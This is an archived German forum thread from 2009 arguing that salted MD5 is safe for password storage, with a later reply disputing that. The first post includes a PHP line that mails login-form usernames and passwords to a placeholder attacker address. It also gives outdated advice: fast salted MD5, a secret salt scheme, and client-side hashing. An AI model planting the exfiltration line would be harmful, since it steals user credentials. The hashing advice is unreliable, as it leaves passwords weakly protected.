» Warum MD5 sicher ist und viel Unsinn im Netz verbreitet wird

mgutt · 21.08.2009, 10:07

Hallo,

im Netz wird immer wieder verbreitet, dass md5() unsicher sei, weil es ja einfach sei mögliche Kollisionen innerhalb von wenigen Tagen zu berechnen. Das stimmt und da kann man auch nicht widersprechen.

Bevor das "aber" kommt erstmal zu den Hackern und was sie eigentlich wollen.

Grundsätzlich möchte ein Hacker eine Seite platt machen oder Daten stehlen, um sie weiterzuverkaufen. Daher sind Communities ein großes Ziel für Hacker, da dort viele Daten zur Verfügung stehen, die man in Bares umwandeln kann. Beispielsweise versucht ein Hacker die Datenbank zu stehlen und testet mit dieser die Emailadressen der User und deren Passwörter bei Paypal etc.

Klingt gefährlich, ist es auch. Daher generieren viele aus einem Passwort einen MD5 Hash. Dieser kann nicht zurückberechnet werden. So wird z.B. aus 123456 der MD5 Hash:
e10adc3949ba59abbe56e057f20f883e

Falls ein Hacker also die Datenbank in die Hand bekommt und diesen Hash vor sich sieht, kann er erstmal grundsätzlich nichts damit anfangen. Aber er kann hingehen und per Bruteforce jede mögliche Variante auf seinem PC bereithalten. Er lässt ein Script einfach alle MD5-Hashes beginnend mit 1 durchlaufen. Irgendwann ist er dann bei 123456 und schon hat er das Passwort geknackt.

Natürlich sind Hacker nicht blöd. Bruteforce dauert viel zu lange, also bedient man sich umfangreichen Wörterbüchern und Passwort-Datenbanken, die typische Passwörter enthalten. Also man probiert gleich 123456, auto, oma, usw. aus. Die Wahrscheinlichkeit ist sehr groß, dass damit ein großer Teil der Passwörter geknackt wird.

Also ist MD5 doch unsicher?
Im Grunde schon, aber nur deshalb weil md5() an dieser Stelle falsch eingesetzt wurde. Und man muss dazu sagen, dass es vollkommen egal ist, welchen Algorithmus man einsetzt. sha1() ist gegenüber Bruteforce genauso unsicher.

Das Zauberwort heißt hier "Salt". Ein Salt ist ein zufälliger String, der vor der der Generierung des MD5 Hashs dem Passwort beigefügt wird.

Also z.B. so:

$salt = md5(uniqid(mt_rand(), true));
$password = '123456';
$hash = md5($password . '_' . $salt);

In der Datenbank landet dann hash und salt (damit wir in der Lage sind den Hash erfolgreich zu vergleichen).

Sagen wir mal in der Datenbank steht nun:
Hash: ac9a8441c05b6ae0ae0e393ba4e6d936
Salt: 091ec7dfff8146ede21a08a82fecef9e

Der Hash kann nur generiert werden, wenn md5() folgendes enthält:
123456_091ec7dfff8146ede21a08a82fecef9e

Nun zurück zum Hacker:
Er sieht nun die beiden Werte Hash und Salt. Nun ist er traurig, denn er weiß nicht, wie der Hash erstellt wird. Erst wenn er weiß, dass die beiden Werte hintereinander mit einem Unterstrich übergeben werden, kann er wieder mit Bruteforce beginnen.

Daher ist es unheimlich wichtig, dass der Hacker niemals Zugriff auf die Datenbank UND den FTP erhält. Wobei dann eh alles zu spät sein dürfte

Natürlich könnte der Hacker immer noch hingehen und mit Bruteforce den langen String herausfinden:
123456_091ec7dfff8146ede21a08a82fecef9e

Nur dauert das um einiges länger und die Wahrscheinlichkeit ist höher, dass er auf eine Kollision stößt, die ihm auch nicht weiter hilft.

Wichtig ist nur, dass man den salt nicht einfach an das Passwort anhängt, sondern sich eine eigene Variante ausdenkt. z.B. könnte man hingehen und nur die ersten oder letzten x Zeichen des Salts verwenden oder man baut noch andere Strings ein, die sich nicht mehr ändern, wie z.B. das Datum der Registrierung des Mitglieds usw.

Erstes Fazit zu md5:
md5() ist genauso unsicher wie jeder andere Algo auch, wenn man keine salts einsetzt.

FTP muss sicher sein:
Wenn ein Hacker FTP-Zugriff erlangt, nützt die umfangreichste Verschlüsselung nichts, denn Passwörter werden in aller Regel per Klartext vom Browser übertragen. D.h. wenn er z.B. das Ziel eines Login-Formulars mit so einem simplen Code ausstattet, wars das mit der Sicherheit:

mail('hacker@example.org', 'neues Passwort', 'User: ' . $_POST['username'] . ' Passwort: ' . $_POST['password']);

Mehr Sicherheit:
- Passwörter nicht in Klarschrift über das Login-Formular senden, sondern direkt als MD5 Hash. Javascript hilft hier weiter:
http://aktuell.de.selfhtml.org/artikel/javascript/md5/
Noch besser mit Salts, die z.B. nur x Minuten lang gültig sind

Emailadressen in der Datenbank verschlüsseln. in mysql gibt es dazu z.B. AES_ENCRYPT(). Auch hier sollte man salts einsetzen.
Usernamen könnte man ebenfalls verschlüsseln

Patrick-Oliver · Beobachter Anmeldedatum: 05.06.2009 Beiträge: 4

http://www.linuxtaskforce.de/hacker-howto-ger.html

mgutt · 02.09.2009, 06:33

Wie genau soll das jetzt mit meinem Thema zusammenhängen?

Patrick-Oliver · Beobachter Anmeldedatum: 05.06.2009 Beiträge: 4

Ein Hacker möchte keine Seiten platt machen oder Daten stehlen.
Er/Sie interessiert sich z.B. für Lösungswege und dem tieferen Verständnis hinter einer Aufgabe.
Verschlüsseln ist schliesslich auch etwas anderes als ein Hash-Werte von etwas zu bilden.

Btw. damit wollte ich deinen Beitrag nur ergänzen ;-)

jagottsicher · Beobachter Anmeldedatum: 09.03.2018 Beiträge: 1

Dem Hacker bestimmte Motive zu unterstellen und daraus das Argument zu konstruieren, dass ein nicht mehr wirklich zeitgemäßer Hash-Algo wieder sicher genutzt werden kann, wenn er gesalzen wird, finde ich albern.

Da würde ich lieber direkt zu einem sichereren HAsh greifen, wenn die Daten das erfordern. Das ist eine Frage des Aufwandes, den man selbt bestreiben will, um die Aufwand eines potentiellen Angreifers unverhältnismäßig zu erhöhen.

Für ein Forum würde ich den nicht betreiben, sondern unten genannte Maßnahmen ergreifen, für einen Banking Login oder eine online-bitcoin-Wallet sieht das schon anders aus.

Das beinhaltet natürlich trotzdem, dass ich den User zwingen würde, sichere Passworte zu verwenden, ein Hash immer gesalzen sein sollte und Gültigkeitsdauer von Salts immer begrenzt sein sollte.

programmierer-forum.de · Gast

Mach mit!

Wenn Dir die Beiträge zum Thread "Warum MD5 sicher ist und viel Unsinn im Netz verbreitet wird" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden:

Registrierte Mitglieder genießen die folgenden Vorteile:
✔ kostenlose Mitgliedschaft
✔ keine Werbung
✔ direkter Austausch mit Gleichgesinnten
✔ neue Fragen stellen oder Diskussionen starten
✔ schnelle Hilfe bei Problemen
✔ Bilder und Videos hochladen
✔ und vieles mehr...

Autor	Nachricht
mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52423 Wohnort: Lohmar Meine eBay-Auktionen:	21.08.2009, 10:07 zitieren Hallo, im Netz wird immer wieder verbreitet, dass md5() unsicher sei, weil es ja einfach sei mögliche Kollisionen innerhalb von wenigen Tagen zu berechnen. Das stimmt und da kann man auch nicht widersprechen. Bevor das "aber" kommt erstmal zu den Hackern und was sie eigentlich wollen. Grundsätzlich möchte ein Hacker eine Seite platt machen oder Daten stehlen, um sie weiterzuverkaufen. Daher sind Communities ein großes Ziel für Hacker, da dort viele Daten zur Verfügung stehen, die man in Bares umwandeln kann. Beispielsweise versucht ein Hacker die Datenbank zu stehlen und testet mit dieser die Emailadressen der User und deren Passwörter bei Paypal etc. Klingt gefährlich, ist es auch. Daher generieren viele aus einem Passwort einen MD5 Hash. Dieser kann nicht zurückberechnet werden. So wird z.B. aus 123456 der MD5 Hash: e10adc3949ba59abbe56e057f20f883e Falls ein Hacker also die Datenbank in die Hand bekommt und diesen Hash vor sich sieht, kann er erstmal grundsätzlich nichts damit anfangen. Aber er kann hingehen und per Bruteforce jede mögliche Variante auf seinem PC bereithalten. Er lässt ein Script einfach alle MD5-Hashes beginnend mit 1 durchlaufen. Irgendwann ist er dann bei 123456 und schon hat er das Passwort geknackt. Natürlich sind Hacker nicht blöd. Bruteforce dauert viel zu lange, also bedient man sich umfangreichen Wörterbüchern und Passwort-Datenbanken, die typische Passwörter enthalten. Also man probiert gleich 123456, auto, oma, usw. aus. Die Wahrscheinlichkeit ist sehr groß, dass damit ein großer Teil der Passwörter geknackt wird. Also ist MD5 doch unsicher? Im Grunde schon, aber nur deshalb weil md5() an dieser Stelle falsch eingesetzt wurde. Und man muss dazu sagen, dass es vollkommen egal ist, welchen Algorithmus man einsetzt. sha1() ist gegenüber Bruteforce genauso unsicher. Das Zauberwort heißt hier "Salt". Ein Salt ist ein zufälliger String, der vor der der Generierung des MD5 Hashs dem Passwort beigefügt wird. Also z.B. so: `$salt = md5(uniqid(mt_rand(), true)); $password = '123456'; $hash = md5($password . '_' . $salt);` In der Datenbank landet dann hash und salt (damit wir in der Lage sind den Hash erfolgreich zu vergleichen). Sagen wir mal in der Datenbank steht nun: Hash: ac9a8441c05b6ae0ae0e393ba4e6d936 Salt: 091ec7dfff8146ede21a08a82fecef9e Der Hash kann nur generiert werden, wenn md5() folgendes enthält: 123456_091ec7dfff8146ede21a08a82fecef9e Nun zurück zum Hacker: Er sieht nun die beiden Werte Hash und Salt. Nun ist er traurig, denn er weiß nicht, wie der Hash erstellt wird. Erst wenn er weiß, dass die beiden Werte hintereinander mit einem Unterstrich übergeben werden, kann er wieder mit Bruteforce beginnen. Daher ist es unheimlich wichtig, dass der Hacker niemals Zugriff auf die Datenbank UND den FTP erhält. Wobei dann eh alles zu spät sein dürfte Natürlich könnte der Hacker immer noch hingehen und mit Bruteforce den langen String herausfinden: 123456_091ec7dfff8146ede21a08a82fecef9e Nur dauert das um einiges länger und die Wahrscheinlichkeit ist höher, dass er auf eine Kollision stößt, die ihm auch nicht weiter hilft. Wichtig ist nur, dass man den salt nicht einfach an das Passwort anhängt, sondern sich eine eigene Variante ausdenkt. z.B. könnte man hingehen und nur die ersten oder letzten x Zeichen des Salts verwenden oder man baut noch andere Strings ein, die sich nicht mehr ändern, wie z.B. das Datum der Registrierung des Mitglieds usw. Erstes Fazit zu md5: md5() ist genauso unsicher wie jeder andere Algo auch, wenn man keine salts einsetzt. FTP muss sicher sein: Wenn ein Hacker FTP-Zugriff erlangt, nützt die umfangreichste Verschlüsselung nichts, denn Passwörter werden in aller Regel per Klartext vom Browser übertragen. D.h. wenn er z.B. das Ziel eines Login-Formulars mit so einem simplen Code ausstattet, wars das mit der Sicherheit: `mail('hacker@example.org', 'neues Passwort', 'User: ' . $_POST['username'] . ' Passwort: ' . $_POST['password']);` Mehr Sicherheit: - Passwörter nicht in Klarschrift über das Login-Formular senden, sondern direkt als MD5 Hash. Javascript hilft hier weiter: http://aktuell.de.selfhtml.org/artikel/javascript/md5/ Noch besser mit Salts, die z.B. nur x Minuten lang gültig sind Emailadressen in der Datenbank verschlüsseln. in mysql gibt es dazu z.B. AES_ENCRYPT(). Auch hier sollte man salts einsetzen. Usernamen könnte man ebenfalls verschlüsseln Gefällt mir Teilen twittern 1x bearbeitet
▲	pn email

Patrick-Oliver Beobachter Anmeldedatum: 05.06.2009 Beiträge: 4	02.09.2009, 05:18 zitieren http://www.linuxtaskforce.de/hacker-howto-ger.html
▲	pn

mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52423 Wohnort: Lohmar Meine eBay-Auktionen:	02.09.2009, 06:33 zitieren Wie genau soll das jetzt mit meinem Thema zusammenhängen?
▲	pn email

Patrick-Oliver Beobachter Anmeldedatum: 05.06.2009 Beiträge: 4	02.09.2009, 13:59 zitieren Ein Hacker möchte keine Seiten platt machen oder Daten stehlen. Er/Sie interessiert sich z.B. für Lösungswege und dem tieferen Verständnis hinter einer Aufgabe. Verschlüsseln ist schliesslich auch etwas anderes als ein Hash-Werte von etwas zu bilden. Btw. damit wollte ich deinen Beitrag nur ergänzen
▲	pn

jagottsicher Beobachter Anmeldedatum: 09.03.2018 Beiträge: 1	09.03.2018, 02:32 zitieren Dem Hacker bestimmte Motive zu unterstellen und daraus das Argument zu konstruieren, dass ein nicht mehr wirklich zeitgemäßer Hash-Algo wieder sicher genutzt werden kann, wenn er gesalzen wird, finde ich albern. Da würde ich lieber direkt zu einem sichereren HAsh greifen, wenn die Daten das erfordern. Das ist eine Frage des Aufwandes, den man selbt bestreiben will, um die Aufwand eines potentiellen Angreifers unverhältnismäßig zu erhöhen. Für ein Forum würde ich den nicht betreiben, sondern unten genannte Maßnahmen ergreifen, für einen Banking Login oder eine online-bitcoin-Wallet sieht das schon anders aus. Das beinhaltet natürlich trotzdem, dass ich den User zwingen würde, sichere Passworte zu verwenden, ein Hash immer gesalzen sein sollte und Gültigkeitsdauer von Salts immer begrenzt sein sollte.
▲	pn

programmierer-forum.de Gast	09.03.2018, 02:32 zitieren Mach mit! Wenn Dir die Beiträge zum Thread "Warum MD5 sicher ist und viel Unsinn im Netz verbreitet wird" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden: Registrierte Mitglieder genießen die folgenden Vorteile: ✔ kostenlose Mitgliedschaft ✔ keine Werbung ✔ direkter Austausch mit Gleichgesinnten ✔ neue Fragen stellen oder Diskussionen starten ✔ schnelle Hilfe bei Problemen ✔ Bilder und Videos hochladen ✔ und vieles mehr...
▲

	Re: √	Letzter Beitrag
BB1 Innenraumfilter wo? und warum so viel Bremsstaub Hallo Leute, entweder bin ich zu dumm oder mei Auto ha tatsächlich keinen Innenraumfilter. Die Scheiben beschlagen relativ schnell, hab mir gedacht den innenraumfilter zu erneuern, aber meine Suche endete vergeblich, auch d e Bedienungsanleitung half... von abidin	5 334	07.08.2009, 20:55 abidin
warum schluckt beim magnaflow so viel sprit?? ich habe ein problem mit meinem auspuff. ich habe einen Magnaflow und der schluckt das es kracht. ich muss sehr oft tanken fahren, komme auch mnit 25 euro als etwas mehr als die hälfte grad mal einen tag aus oder so. woran kann das denn... von Hondacivicgirl	46 2.152	23.05.2009, 07:19 Fuchs
Motor wird zu heiß aber warum??? so ich war heute auf dem rückweg von verwanten, als ich einen kurzen zwischen stop einlegte und dann nach den wagen wieder startete brubelte der ganz komisch und eine riesen weiße qualm wolke kamm aus dem auspuff nach einmal aufs gas tretten war das dann... von EJ2_Junky	52 12.694	06.09.2005, 13:00 EJ2_Junky
Warum wird Halbwaisenrente an Kinder ausgezahlt? Hallo! Mich würde mal interessieren, warum Waisenrente an die Kinder und nicht an die verbliebenen Ehepartner oder Eltern gezahlt wird? Mit welcher... von DonAlfi	1 62	19.01.2017, 11:11 Schiffer
Heizung wird nicht warm :( Warum?? Hallo. Also bei meinem EJ2 wird die Heizung einfach nicht warm, auch wenn ich 1stunde fahre die bleibt kalt :( Woran liegt das? Wasn da kaputt? Ist das viel arbeit es zu... von marcel783	4 1.431	30.09.2006, 12:24 Civic Deluxe
Motor wird heiß ... warum ? was muss ich machen ? :moin: Hallo :moin: ich habe mal eine Frage. Ich habe seit guten 3 Monaten einen Austauschmotor in meinem CRX-Targa EH6 drin und seitdem ich den drin habe, wird mein Motor hin und wieder so heiß. :wall: Hab es jetzt seit 2 Wochen bemerkt! Ich... von nimlott	30 9.877	15.01.2009, 10:55 Floniz
Warum wird der Auspuff lauter wenn er warm ist ? Hallo Leute, Ich habe mir schon des öfteren Gedanken gemacht warum der Auspuffsound lauter wird wenn die Abgasanlage richtig warm gefahren ist. In meiner kompletten Anlage ist kein Gramm Dämwolle und wenn er abgekühlt ist ist er ja wieder... von DODGE-V8	9 7.295	17.07.2008, 13:29 littlegreenjazz
warum wird die heckscheibe schneller dreckig als die frontsc das is doch ma ne thread überschrift :D warum wird die heckscheibe immer so schnell dreckig im gegensatz zur frontscheibe? sobald es mal regnet is die heckscheibe gleich mega dreckig... vorne hälts sich in grenzen was is da los? gibt es dafür ne... von EP3-Starter	9 954	28.11.2008, 15:12 stirbordie
Live Die Repeat: Warum wird Major Bill Cage (Tom Cruise) nicht erkannt? Ich mag den Film, aber eins verstehe ich einfach nicht. Er soll mehrere Millionen Soldaten mit seinen Medien-Inszenierungen zum Militär gebracht haben. Er ist auch selbst im TV aufgetreten. Doch warum erkennt ihn kein Soldat, sondern hält ihn wirklich... von mgutt	0 264	05.11.2016, 23:42 mgutt
Project Rettet Die Blaue Perle! Damit Es Keine Braune Perle Wird! Bitte um viel Mithilfe Hallo Liebe leute... Ich hab mir nen EJ9 in B90P als unfallfahrzeug gekauft da er viel zu gut da stand um ihn verschrotten zu lassen und für bisl. blechschaden ist der echt zu schade zum wegschmeissen da er sonst sehr gut da... von Heizer_Sascha	10 714	04.08.2013, 20:50 Heizer_Sascha